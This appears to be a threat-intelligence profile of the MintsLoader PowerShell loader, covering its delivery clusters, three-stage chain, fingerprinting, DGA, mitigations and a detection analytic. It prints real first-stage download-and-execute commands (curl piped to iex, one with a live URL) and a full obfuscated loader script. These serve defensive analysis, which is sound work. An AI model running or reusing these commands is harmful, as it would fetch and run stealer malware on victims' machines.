MintsLoader
MintsLoader is a multi-staged, obfuscated PowerShell loader that uses JavaScript to drop a variety of payloads.
#9
Overall Rank
2%
Customers Affected
MintsLoader is a PowerShell-based malware loader that uses JavaScript and PowerShell to download and execute additional payloads, including StealC, Vidar, and AsyncRAT. The threat is characterized by a URL that contains 1.php?s=, where the parameter referenced after the equal sign is a campaign identifier.
Initial access clusters
Red Canary observed at least three distinct clusters of activity delivering MintsLoader in 2025.
Paste and run with KongTuke
By far the most frequent is a cluster of paste-and-run activity associated with KongTuke. In this cluster, users are urged to copy the MintsLoader first-stage PowerShell command directly into the Windows run dialog. For example:
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[://]lalclenfjhkinbn[.]top/1.php?s=527;iex $global:block.content
The command would then directly curl down the MintsLoader second stage and continue the execution chain.
SocGholish
Another cluster of activity includes SocGholish, this year’s 8th most prevalent threat, delivering MintsLoader. This cluster begins with initial execution of the SocGholish fake update JavaScript, and, within seconds, execution of an obfuscated version of the first-stage MintsLoader PowerShell command. Once deobfuscated, the script uses curl to download the next stage from a DGA domain with the .top top-level domain.
JavaScript lures
We also observed another initial access cluster that, like SocGholish, relied on malicious JavaScript lures. In some instances, this cluster used language specific lures like Fattura (Italian for “invoice”), followed by 8 digits, for example: Fattura26940207.js.
In other instances, lures followed in the footsteps of 2024 SocGholish and Scarlet Goldfinch behavior, using the name update.js. The JavaScript contents often contained large amounts of text, often excerpted from the same book, to obfuscate the code used to call the MintsLoader first stage.
MintsLoader is frequently delivered from paste-and-run-activity associated with KongTuke.
MintsLoader typically operates in three stages.
Initial download
The first stage of the malware is a PowerShell script that uses curl to retrieve the second stage of the malware and execute it:
"PowerShell.exe" -WindowStyle Hidden $global:block=curl -useb http://bfhdkgmmhdbikgj.top/1.php?s=527;iex $global:block.content
In some cases, this first stage command is obfuscated, often employing some basic addition and subtraction with a hardcoded key to encrypt decimal values of characters within the command line:
$mtfgncslzoh='ur' ;set-alias mitresa c$($mtfgncslzoh)l;$eyfgdrxtonz=(8199,8211,8211,8207,8153,8142,8142,8196,8214,8198,8198,8213,8199,8213,8144,8144,8145,8141,8211,8206,8207,8142,8144,8141,8207,8199,8207,8158,8210,8156,8149,8146,8196,8152,8148,8193,8196,8144,8140,8152,8145,8196,8143,8140,8147,8148,8194,8144,8140,8192,8152,8145,8151,8140,8149,8148,8195,8149,8146,8193,8144,8150,8194,8195,8144,8194);$ytcwmx=('reicporet','get-cmdlet');$vadjfpzeqrhnk=$eyfgdrxtonz;foreach($pgervkjxd in $vadjfpzeqrhnk){$ropevbfjanlm=$pgervkjxd;$tbcevxwszugj=$tbcevxwszugj+[char]($ropevbfjanlm-8095);$zipcdfqtvrgk=$tbcevxwszugj; $uqcklneydp=$zipcdfqtvrgk};$bythnpjxazqs[2]=$uqcklneydp;$aikslvnymdehcw='rl';$mgwjrapx=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(mitresa -useb $uqcklneydp)This PowerShell script sets an alias for curl, and runs a for loop to generate the target URL, in this case hxxp[://]ewggvhv112[.]top/1.php?s=63e95be1-92e0-45c1-a928-65d63b17cd1c.
The curl command is then executed with the -useb parameters and referencing the deobfuscated URL.
System information discovery
The payload retrieved by curl is the second stage of MintsLoader. It is another obfuscated PowerShell script, executed in memory by the first-stage PowerShell process, that attempts an AMSI bypass and conducts system reconnaissance to determine what type of machine it is on. The script checks to see if the system is a virtual machine, checks the video controller, and checks what kind of cache memory is being used. During these checks the script will add values to a key, depending on the output of the command, as a way to fingerprint the host. This key value is later passed as a parameter in the URI, along with the computer name, when the script reaches out to command and control:
hxxp://<dga_domain>.top/<randomly_generated_value>.php?id=$env:computername&key=<generated_key_value>&s=63e95be1-92e0-45c1-a928-65d63b17cd1c
The domain generation algorithm that is in the second stage uses the day of the year and additional constants to generate a seed for a pseudorandom number generator to generate a 15-character domain using the .top TLD. The majority of the observed infrastructure is hosted on BLNWX (ASN399628), a known virtual private server reseller.
Payload execution
The final stage also takes the form of a PowerShell script that contains similar obfuscation to the second stage. Once the script is deobfuscated, another AMSI bypass is attempted and the final payload is retrieved and executed. Ultimately, the payloads deployed are typically stealers that are usually aimed at gathering further information about the victim.
Much like with SocGholish, the JavaScript initial access clusters associated with MintsLoader can be mitigated by using a group policy object (GPO) to change the default behavior in Windows to open JS files with Notepad or another editor.
Additionally, a similar GPO mitigation strategy can be applied with paste and run, disabling Windows Hotkeys for users. However, since the use of Windows hotkeys is a popular feature, user education may be a more frictionless alternative.
PowerShell executing invoke-expression and invoke-restmethod
The following pseudo-detection analytic identifies instances of PowerShell using invoke-expression and invoke-restmethod to download content at a remote IP address. Adversaries can use this function to download and execute remotely hosted scripts, as seen in many paste-and-run commands. Note that some utilities like chocolately or chef use these functions legitimately.
process == ('powershell')
&&
deobfuscated_command_includes ('irm' || 'invoke-restmethod')
&&
deobfuscated_command_includes ('iex' || 'invoke-expression')
&&
deobfuscated_command_includes (‘https?’ || IP address)
&&
deobfuscated_command_excludes (approved URL || approved IP address)